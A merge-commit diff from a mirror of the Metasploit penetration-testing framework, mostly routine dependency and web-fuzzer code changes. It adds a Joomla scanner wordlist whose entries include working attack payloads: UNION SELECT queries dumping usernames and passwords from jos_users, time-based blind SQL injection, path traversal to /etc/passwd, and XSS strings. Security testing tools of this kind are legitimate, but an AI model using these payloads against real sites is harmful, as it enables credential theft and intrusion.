infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'rapid7' into sonicwall_gms 

Conflicts:
	modules/exploits/multi/http/sonicwall_gms_upload.rb

Adds a loop around triggering the WAR payload, which was causing some
unreliability with the Java target.
bug/bundler_fix
James Lee 2013-02-07 21:53:49 -06:00
parent e535a3e93f d5b0482127
commit 071df7241b
144 changed files with 4547 additions and 497 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Gemfile
View File

@ -2,12 +2,8 @@ source 'http://rubygems.org'
# Need 3+ for ActiveSupport::Concern
gem 'activesupport', '>= 3.0.0'
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0'
group :development do
# Markdown formatting for yard

22
Gemfile.lock
View File

@ -1,10 +1,10 @@
GIT
remote: git://github.com/rapid7/metasploit_data_models.git
revision: 73f26789500f278dd6fd555e839d09a3b81a05f4
tag: 0.3.0
revision: 448c1065329efea1eac76a3897f626f122666743
tag: 0.4.0
specs:
metasploit_data_models (0.3.0)
activerecord
metasploit_data_models (0.4.0)
activerecord (>= 3.2.10)
activesupport
pg
pry
@ -12,15 +12,15 @@ GIT
GEM
remote: http://rubygems.org/
specs:
activemodel (3.2.9)
activesupport (= 3.2.9)
activemodel (3.2.11)
activesupport (= 3.2.11)
builder (~> 3.0.0)
activerecord (3.2.9)
activemodel (= 3.2.9)
activesupport (= 3.2.9)
activerecord (3.2.11)
activemodel (= 3.2.11)
activesupport (= 3.2.11)
arel (~> 3.0.2)
tzinfo (~> 0.3.29)
activesupport (3.2.9)
activesupport (3.2.11)
i18n (~> 0.6)
multi_json (~> 1.0)
arel (3.0.2)
@ -57,10 +57,8 @@ PLATFORMS
ruby
DEPENDENCIES
activerecord
activesupport (>= 3.0.0)
metasploit_data_models!
pg (>= 0.11)
rake
redcarpet
rspec (>= 2.12)

BIN
data/gui/msfgui.jar
View File

Binary file not shown.

20
data/sql/migrate/20110608113500_add_cred_file_table.rb
View File

@ -1,20 +0,0 @@
class AddCredFileTable < ActiveRecord::Migration
def self.up
create_table :cred_files do |t|
t.integer :workspace_id, :null => false, :default => 1
t.string :path, :limit => 1024
t.string :ftype, :limit => 16
t.string :created_by
t.string :name, :limit => 512
t.string :desc, :limit => 1024
t.timestamps
end
end
def self.down
drop_table :cred_files
end
end

627
data/wordlists/joomla.txt Executable file
View File

@ -0,0 +1,627 @@
&controller=../../../../../../../../../../../../[LFI]%00
?1.5.10-x
?1.5.11-x-http_ref
?1.5.11-x-php-s3lf
?1.5.3-path-disclose
?1.5.3-spam
?1.5.8-x
?1.5.9-x
?j1012-fixate-session
?option=com_mysms&Itemid=0&task=phonebook
Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
admin/
administrator/
administrator/components/
administrator/components/com_a6mambocredits/
administrator/components/com_a6mambohelpdesk/
administrator/components/com_admin/admin.admin.html.php
administrator/components/com_astatspro/refer.php
administrator/components/com_bayesiannaivefilter/
administrator/components/com_chronocontact/excelwriter/PPS/File.php
administrator/components/com_colophon/
administrator/components/com_colorlab/
administrator/components/com_comprofiler/
administrator/components/com_comprofiler/plugin.class.php
administrator/components/com_cropimage/admin.cropcanvas.php
administrator/components/com_extplorer/
administrator/components/com_feederator/includes/tmsp/add_tmsp.php
administrator/components/com_googlebase/
administrator/components/com_installer
administrator/components/com_jcs/
administrator/components/com_jim/
administrator/components/com_jjgallery/
administrator/components/com_joom12pic/
administrator/components/com_joomla-visites/
administrator/components/com_joomla_flash_uploader/
administrator/components/com_joomlaflashfun/
administrator/components/com_joomlaradiov5/
administrator/components/com_jpack/
administrator/components/com_jreactions/
administrator/components/com_juser/
administrator/components/com_admin/
administrator/components/com_kochsuite /
administrator/components/com_linkdirectory/
administrator/components/com_livechat/getSavedChatRooms.php
administrator/components/com_livechat/xmlhttp.php
administrator/components/com_lurm_constructor/admin.lurm_constructor.php
administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
administrator/components/com_mambelfish/
administrator/components/com_mgm/
administrator/components/com_mmp/help.mmp.php
administrator/components/com_mosmedia/
administrator/components/com_multibanners/extadminmenus.class.php
administrator/components/com_panoramic/
administrator/components/com_peoplebook/param.peoplebook.php
administrator/components/com_phpshop/toolbar.phpshop.html.php
administrator/components/com_remository/admin.remository.php
administrator/components/com_serverstat/install.serverstat.php
administrator/components/com_simpleswfupload/uploadhandler.php");
administrator/components/com_swmenupro/
administrator/components/com_treeg/
administrator/components/com_uhp/
administrator/components/com_uhp2/
administrator/components/com_webring/
administrator/components/com_wmtgallery/
administrator/components/com_wmtportfolio/
administrator/components/com_x-shop/
administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
administrator/index.php?option=com_searchlog&act=log
ajaxim/
akocomments.php
cart?Itemid=[SQLi]
component/com__brightweblinks/
component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
component/osproperty/?task=agent_register
component/quran/index.php?option=com_quran&action=viewayat&surano=
components/com_ clickheat/
components/com_5starhotels/
components/com_Jambook/jambook.php
components/com_a6mambocredits/
components/com_a6mambohelpdesk/
components/com_ab_gallery/
components/com_acajoom/
components/com_acctexp/
components/com_aclassf/
components/com_activities/
components/com_actualite/
components/com_admin/admin.admin.html.php
components/com_advancedpoll/
components/com_agora/
components/com_agoragroup/
components/com_ajaxchat/
components/com_akobook/
components/com_akocomment/
components/com_akogallery
components/com_alberghi/
components/com_allhotels/
components/com_alphacontent/
components/com_altas/
components/com_amocourse/
components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
components/com_articles/
components/com_artist/
components/com_artlinks/
components/com_asortyment/
components/com_astatspro/
components/com_awesom/
components/com_babackup/
components/com_banners/
components/com_bayesiannaivefilter/
components/com_be_it_easypartner/
components/com_beamospetition/
components/com_biblestudy/
components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
components/com_blog/
components/com_bookflip/
components/com_bookjoomlas/
components/com_booklibrary/
components/com_books/
components/com_bsadv/
components/com_bsq_sitestats/
components/com_bsq_sitestats/external/rssfeed.php
components/com_bsqsitestats/
components/com_calendar/
components/com_camelcitydb2/
components/com_candle/
components/com_casino_blackjack/
components/com_casino_videopoker/
components/com_casinobase/
components/com_catalogproduction/
components/com_catalogshop/
components/com_category/
components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
components/com_chronocontact/excelwriter/PPS/File.php
components/com_cinema/
components/com_clasifier/
components/com_classifieds/
components/com_clickheat/
components/com_cloner/
components/com_cmimarketplace/
components/com_cms/
components/com_colophon/
components/com_colorlab/
components/com_competitions/
components/com_comprofiler/
components/com_comprofiler/plugin.class.php
components/com_contactinfo/
components/com_content/
components/com_cpg/cpg.php
components/com_cropimage/admin.cropcanvas.php
components/com_custompages/
components/com_cx/
components/com_d3000/
components/com_dadamail/
components/com_dailymessage/
components/com_datsogallery/
components/com_dbquery/
components/com_detail/
components/com_digistore/
components/com_directory/
components/com_djiceshoutbox/
components/com_doc/
components/com_downloads/
components/com_ds-syndicate/
components/com_dtregister/
components/com_dv/externals/phpupload/upload.php");
components/com_easybook/
components/com_emcomposer/
components/com_equotes/
components/com_estateagent/
components/com_eventing/
components/com_eventlist/
components/com_events/
components/com_ewriting/
components/com_expose/uploadimg.php
components/com_expshop/
components/com_extcalendar/
components/com_extcalendar/cal_popup.php?extmode=view&extid=
components/com_extcalendar/extcalendar.php
components/com_extended_registration/registration_detailed.inc.php
components/com_extplorer/
components/com_ezine/
components/com_ezstore/
components/com_facileforms/
components/com_fantasytournament/
components/com_faq/
components/com_feederator/includes/tmsp/add_tmsp.php
components/com_filebase/
components/com_filiale/
components/com_flashfun/
components/com_flashmagazinedeluxe/
components/com_flippingbook/
components/com_flyspray/startdown.php
components/com_fm/fm.install.php
components/com_foevpartners/
components/com_football/
components/com_formtool/
components/com_forum/
components/com_fq/
components/com_fundraiser/
components/com_galeria/
components/com_galleria/galleria.html.php
components/com_gallery/
components/com_game/
components/com_gameq/
components/com_garyscookbook/
components/com_genealogy/
components/com_geoboerse/
components/com_gigcal/
components/com_gmaps/
components/com_googlebase/
components/com_gsticketsystem/
components/com_guide/
components/com_hashcash/server.php
components/com_hbssearch/
components/com_hello_world/
components/com_hotproperties/
components/com_hotproperty/
components/com_hotspots/
components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
components/com_hwdvideoshare/
components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
components/com_ice/
components/com_idoblog/
components/com_idvnews/
components/com_ignitegallery/
components/com_ijoomla_archive/
components/com_ijoomla_rss/
components/com_inter/
components/com_ionfiles/
components/com_is/
components/com_ixxocart/
components/com_jabode/
components/com_jashowcase/
components/com_jb2/
components/com_jce/
components/com_jcs/
components/com_jd-wiki/
components/com_jd-wp/
components/com_jim/
components/com_jjgallery/
components/com_jmovies/
components/com_jobline/
components/com_jombib/
components/com_joobb/
components/com_jooget/
components/com_joom12pic/
components/com_joomla-visites/
components/com_joomla_flash_uploader/
components/com_joomlaboard/
components/com_joomladate/
components/com_joomlaflashfun/
components/com_joomlalib/
components/com_joomlaradiov5/
components/com_joomlavvz/
components/com_joomlaxplorer/
components/com_joomloads/
components/com_joomradio/
components/com_joomtracker/
components/com_joovideo/
components/com_jotloader/
components/com_journal/
components/com_jpack/
components/com_jpad/
components/com_jreactions/
components/com_jreviews/scripts/xajax.inc.php
components/com_jumi/
components/com_juser/
components/com_jvideo/
components/com_k2/
components/com_kbase/
components/com_knowledgebase/fckeditor/fckeditor.js
components/com_kochsuite /
components/com_kunena/
components/com_letterman/
components/com_lexikon/
components/com_linkdirectory/
components/com_listoffreeads/
components/com_livechat/getSavedChatRooms.php
components/com_livechat/xmlhttp.php
components/com_liveticker/
components/com_lm/
components/com_lmo/
components/com_loudmounth/includes/abbc/abbc.class.php
components/com_loudmouth/
components/com_lowcosthotels/
components/com_lurm_constructor/admin.lurm_constructor.php
components/com_mad4joomla/
components/com_madeira/img.php
components/com_maianmusic/
components/com_mailarchive/
components/com_mailto/
components/com_mambatstaff/mambatstaff.php
components/com_mambelfish/
components/com_mambospgm/
components/com_mambowiki/MamboLogin.php
components/com_marketplace/
components/com_mcquiz/
components/com_mdigg/
components/com_media_library/
components/com_mediaslide/
components/com_mezun/
components/com_mgm/
components/com_minibb/
components/com_misterestate/
components/com_mmp/help.mmp.php
components/com_model/
components/com_moodle/moodle.php
components/com_moofaq/
components/com_mosmedia/
components/com_mospray/scripts/admin.php
components/com_mosres/
components/com_most/
components/com_mp3_allopass/
components/com_mtree/
components/com_mtree/img/listings/o/{id}.php
components/com_multibanners/extadminmenus.class.php
components/com_myalbum/
components/com_mycontent/
components/com_mydyngallery/
components/com_mygallery/
components/com_n-forms/
components/com_na_content/
components/com_na_mydocs/
components/com_na_newsdescription/
components/com_na_qforms/
components/com_neogallery/
components/com_neorecruit/
components/com_neoreferences/
components/com_netinvoice/
components/com_news/
components/com_news_portal/
components/com_newsflash/
components/com_nfn_addressbook/
components/com_nicetalk/
components/com_noticias/
components/com_omnirealestate/
components/com_omphotogallery/
components/com_ongumatimesheet20/
components/com_onlineflashquiz/
components/com_ownbiblio/
components/com_panoramic/
components/com_paxgallery/
components/com_paxxgallery/
components/com_pcchess/
components/com_pcchess/include.pcchess.php
components/com_pccookbook/
components/com_pccookbook/pccookbook.php
components/com_peoplebook/param.peoplebook.php
components/com_performs/
components/com_philaform/
components/com_phocadocumentation/
components/com_php/
components/com_phpshop/toolbar.phpshop.html.php
components/com_pinboard/
components/com_pms/
components/com_poll/
components/com_pollxt/
components/com_ponygallery/
components/com_portafolio/
components/com_portfol/
components/com_prayercenter/
components/com_pro_desk/
components/com_prod/
components/com_productshowcase/
components/com_profiler/
components/com_projectfork/
components/com_propertylab/
components/com_puarcade/
components/com_publication/
components/com_quiz/
components/com_rapidrecipe/
components/com_rdautos/
components/com_realestatemanager/
components/com_recly/
components/com_referenzen/
components/com_rekry/
components/com_remository/admin.remository.php
components/com_remository_files/file_image_14/1276100016shell.php
components/com_reporter/processor/reporter.sql.php
components/com_resman/
components/com_restaurante/
components/com_ricette/
components/com_rsfiles/
components/com_rsgallery/
components/com_rsgallery2/
components/com_rss/
components/com_rssreader/
components/com_rssxt/
components/com_rwcards/
components/com_school/
components/com_search/
components/com_sebercart/getPic.php?p=[LFD]%00
components/com_securityimages/
components/com_sef/
components/com_seminar/
components/com_serverstat/install.serverstat.php
components/com_sg/
components/com_simple_review/
components/com_simpleboard/
components/com_simplefaq/
components/com_simpleshop/
components/com_sitemap/sitemap.xml.php
components/com_slideshow/
components/com_smf/
components/com_smf/smf.php
components/com_swmenupro/
components/com_team/
components/com_tech_article/
components/com_thopper/
components/com_thyme/
components/com_tickets/
components/com_tophotelmodule/
components/com_tour_toto/
components/com_trade/
components/com_uhp/
components/com_uhp2/
components/com_user/controller.php
components/com_users/
components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
components/com_vehiclemanager/
components/com_versioning /
components/com_videodb/core/videodb.class.xml.php
components/com_virtuemart/
components/com_volunteer/
components/com_vr/
components/com_waticketsystem/
components/com_webhosting/
components/com_weblinks/
components/com_webring/
components/com_wmtgallery/
components/com_wmtportfolio/
components/com_x-shop/
components/com_xevidmegahd/
components/com_xewebtv/
components/com_xfaq/
components/com_xgallery/helpers/img.php?file=
components/com_xsstream-dm/
components/com_ynews/
components/com_yvcomment/
components/com_zoom/classes/
components/mod_letterman/
components/remository/
eXtplorer/
easyblog/entry/uncategorized
extplorer/
components/com_mtree/img/listings/o/{id}.php where {id}
includes/joomla.php
index.php/404'
index.php/?option=com_question&catID=21' and+1=0 union all
index.php/image-gallery/"><script>alert('xss')</script>/25-koala
index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&amp;type=css&v=1
index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
index.php?option=com_aardvertiser&cat_name=conf&task=<=
index.php?option=com_aardvertiser&task=
index.php?option=com_abc&view=abc&letter=AS&sectionid='
index.php?option=com_advert&id=36'
index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
index.php?option=com_alfurqan15x&action=viewayat&surano=
index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
index.php?option=com_annonces&view=edit&Itemid=1
index.php?option=com_articleman&task=new
index.php?option=com_bbs&bid=-1
index.php?option=com_beamospetition&startpage=3&pet=-
index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
index.php?option=com_chronoconnectivity&itemid=1
index.php?option=com_chronocontact&itemid=1
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
index.php?option=com_clantools&squad=1+
index.php?option=com_clantools&task=clanwar&showgame=1+
index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
index.php?option=com_commedia&task=page&commpid=21
index.php?option=com_connect&view=connect&controller=
index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_dioneformwizard&controller=[LFI]%00
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
index.php?option=com_easyfaq&Itemid=1&task=view&gid=
index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
index.php?option=com_easyfaq&task=view&contact_id=
index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
index.php?option=com_equipment&task=components&id=45&sec_men_id=
index.php?option=com_equipment&view=details&id=
index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
index.php?option=com_etree&view=displays&layout=category&id=[SQL]
index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
index.php?option=com_filecabinet&task=download&cid[]=7
index.php?option=com_firmy&task=section_show_set&Id=-1
index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
index.php?option=com_graphics&controller=
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
index.php?option=com_huruhelpdesk&view=detail
index.php?option=com_huruhelpdesk&view=detail&cid[0]=
index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
index.php?option=com_iproperty&view=agentproperties&id=
index.php?option=com_jacomment&view=
index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_jcommunity&controller=members&task=1'
index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_jfuploader&Itemid=
index.php?option=com_jgen&task=view&id=
index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
index.php?option=com_jimtawl&Itemid=12&task=
index.php?option=com_jmarket&controller=product&task=1'
index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
index.php?option=com_jomdirectory&task=search&type=111+
index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
index.php?option=com_joomla_flash_uploader&Itemid=1
index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
index.php?option=com_joomtouch&controller=
index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
index.php?option=com_jstore&controller=product-display&task=1'
index.php?option=com_jsubscription&controller=subscription&task=1'
index.php?option=com_jtickets&controller=ticket&task=1'
index.php?option=com_konsultasi&act=detail&sid=
index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
index.php?option=com_kunena&func=userlist&search=
index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
index.php?option=com_matamko&controller=
index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
index.php?option=com_neorecruit&task=offer_view&id=
index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
index.php?option=com_noticeboard&controller=
index.php?option=com_obsuggest&controller=
index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
index.php?option=com_oziogallery&Itemid=
index.php?option=com_page&id=53
index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
index.php?option=com_phocagallery&view=categories&Itemid=
index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_php&file=../../../../../../../../../../etc/passwd
index.php?option=com_php&file=../images/phplogo.jpg
index.php?option=com_php&file=../js/ie_pngfix.js
index.php?option=com_ponygallery&Itemid=[sqli]
index.php?option=com_products&catid=-1
index.php?option=com_products&id=-1
index.php?option=com_products&product_id=-1
index.php?option=com_products&task=category&catid=-1
index.php?option=com_properties&task=agentlisting&aid=
index.php?option=com_qcontacts&Itemid=1'
index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_restaurantguide&view=country&id='&Itemid=69
index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
index.php?option=com_seyret&view=
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
index.php?option=com_smartsite&controller=
index.php?option=com_spa&view=spa_product&cid=
index.php?option=com_spidercalendar
index.php?option=com_spidercalendar&date=1'
index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_staticxt&staticfile=test.php&id=1923
index.php?option=com_szallasok&mode=8&id=25 (SQL)
index.php?option=com_tag&task=tag&tag=
index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
index.php?option=com_ultimateportfolio&controller=
index.php?option=com_users&view=registration
index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_x-shop&action=artdetail&idd='
index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
index.php?option=com_xcomp&controller=../../[LFI]%00
index.php?option=com_xvs&controller=../../[LFI]%00
index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
index.php?option=com_yjcontactus&view=
index.php?option=com_youtube&id_cate=4
index.php?option=com_zina&view=zina&Itemid=9
index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
index.php?search=NoGe&option=com_esearch&searchId=
index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
js/index.php?option=com_socialads&view=showad&Itemid=94
libraries/joomla/utilities/compat/php50x.php
libraries/pcl/pcltar.php
libraries/phpmailer/phpmailer.php
libraries/phpxmlrpc/xmlrpcs.php
modules/mod_artuploader/upload.php");
modules/mod_as_category.php
modules/mod_calendar.php
modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
modules/mod_jfancy/script.php");
modules/mod_ppc_simple_spotlight/elements/upload_file.php
modules/mod_ppc_simple_spotlight/img/
modules/mod_pxt/
modules/mod_quick_question.php
modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
patch/makedown.php?arquivo=../../../../etc/passwd
plugins/content/efup_files/helper.php");
plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
plugins/editors/xstandard/attachmentlibrary.php
print.php?task=person&id=36 and 1=1
templates/be2004-2/
templates/ja_purity/
wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'

3
external/source/gui/msfguijava/src/msfgui/RpcConnection.java vendored
View File

@ -260,7 +260,8 @@ public abstract class RpcConnection {
// Don't fork cause we'll check if it dies
String rpcType = "Basic";
java.util.List args = new java.util.ArrayList(java.util.Arrays.asList(new String[]{
"msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1"}));
"msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1",
"-p",Integer.toString(defaultPort)}));
if(!defaultSsl)
args.add("-S");
if(disableDb)

4
lib/msf/core/auxiliary/web.rb
View File

@ -250,7 +250,9 @@ module Auxiliary::Web
if !(payload = opts[:payload])
if payloads
payload = payloads.select{ |p| element.altered_value.include?( p ) }.first
payload = payloads.select { |p|
element.altered_value.include?( p )
}.sort_by { |p| p.size }.last
end
end

5
lib/msf/core/auxiliary/web/analysis/differential.rb
View File

@ -101,7 +101,7 @@ module Analysis::Differential
# save the response and some data for analysis
responses[:good][elem.altered] << {
'res' => res,
'elem' => elem
'elem' => elem.dup
}
end
end
@ -122,8 +122,7 @@ module Analysis::Differential
http.if_not_custom_404( action, res['res'].body ) do
# if this isn't a custom 404 page then it means that
# the element is vulnerable, so go ahead and log the issue
fuzzer.process_vulnerability( res['elem'], 'Manipulatable responses.',
:payload => res['elem'].altered_value )
fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.' )
end
end
end

3
lib/msf/core/auxiliary/web/analysis/timing.rb
View File

@ -54,7 +54,8 @@ module Analysis::Timing
timeout = opts[:delay]
seed = p.altered_value.dup
payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.first
payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.
sort_by { |p2| p2.size }.last
# 1st pass, make sure the webapp is responsive
if_responsive do

14
lib/msf/core/auxiliary/web/http.rb
View File

@ -120,10 +120,15 @@ class Auxiliary::Web::HTTP
tl = []
loop do
# Spawn threads for each host
while tl.size <= (opts[:max_threads] || 5) && !@queue.empty? && (req = @queue.pop)
tl << framework.threads.spawn( "#{self.class.name} - #{req})", false, req ) do |request|
# Keep callback failures isolated.
begin
request.handle_response request( request.url, request.opts )
rescue => e
elog e.to_s
e.backtrace.each { |l| elog l }
end
end
end
@ -291,7 +296,12 @@ class Auxiliary::Web::HTTP
Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout )
rescue ::Timeout::Error
Response.timed_out
rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
#rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
# This is bad but we can't anticipate the gazilion different types of network
# i/o errors between Rex and Errno.
rescue => e
elog e.to_s
e.backtrace.each { |l| elog l }
Response.empty
end

21
lib/msf/core/exploit/http/client.rb
View File

@ -536,20 +536,21 @@ module Exploit::Remote::HttpClient
end
#
# Make sure the URI starts with a slash and doesn't end with one
# Returns a modified version of the URI that:
# 1. Always has a starting slash
# 2. Removes all the double slashes
#
def normalize_uri(str)
def normalize_uri(*strs)
new_str = strs * "/"
unless str.to_s[0,1] == "/"
str = "/" + str.to_s
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str[0,1] == '/'
new_str = '/' + new_str
end
str = str.gsub(/^\/+/, '/')
unless str.length == 1
str = str.gsub(/\/+$/, '')
end
str
new_str
end
#

9
lib/msf/core/exploit/web.rb
View File

@ -75,7 +75,8 @@ module Exploit::Remote::Web
def exploit
print_status "Sending HTTP request for #{path}"
if res = perform_request
res = perform_request
if res
print_status "The server responded with HTTP status code #{res.code}."
else
